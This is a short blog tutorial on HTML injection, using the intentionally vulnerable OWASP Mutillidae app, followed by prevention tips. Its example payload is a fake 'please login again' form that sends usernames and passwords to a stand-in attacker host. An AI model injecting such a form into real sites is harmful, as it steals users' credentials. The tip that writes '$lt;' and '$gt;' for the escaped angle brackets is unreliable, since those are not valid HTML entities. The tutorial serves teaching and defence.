i HTML injection – All things in moderation

HTML injection


HTML Injection is a client-site vulnerability which occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This type of attack can be used in combination with some sort of social engineering in order to trick valid users of the application to open malicious websites, insert their credentials in a fake login form that it will stealing user’s credentials, disclosure of a user’s session cookies that could be used to impersonate the victim,…


This example using OWASP Mutillidae, you can download from OWASP Broken Web Applications Project

We have a page add-to-your-blog.php like the following:

This form is accepting user submit HTML tags. An attacker can exploit the users of this application by set up a page that is capturing their account. If he has this page then he can trick the users to enter their credentials by injecting into the vulnerable page a fake HTML login form like following, user’s credentials then submit to attacker server.

<h1>Sorry, please login again</h1><br/>

<form method="post" action="http://attacker.com/stealing.php">

Username<input type="text" name="username"><br/>
Password<input type="password"name="password"><br/>
<input type="submit" value="Submit">


Every user read this blog and enter their credentials in following form then submit to attacker server.

Prevent for HTML Injection Attack

– Never insert untrusted data excepting some allowable locations.

– Replace HTML symbols by HTML name that can’t excute, for example:

“<” replace by ” $lt; ”

“>” replace by ” $gt; ”

– Use HTML Escape before inserting untrusted data into HTML element content.

– Use Attribute escape before inserting untrusted data into HTML common attributes.

– Use URL escape before inserting untrusted data into HTML URL parameter values.

Read more Prevention methods: XSS (Cross Site Scripting) Prevention Cheat Sheet

Leave a Reply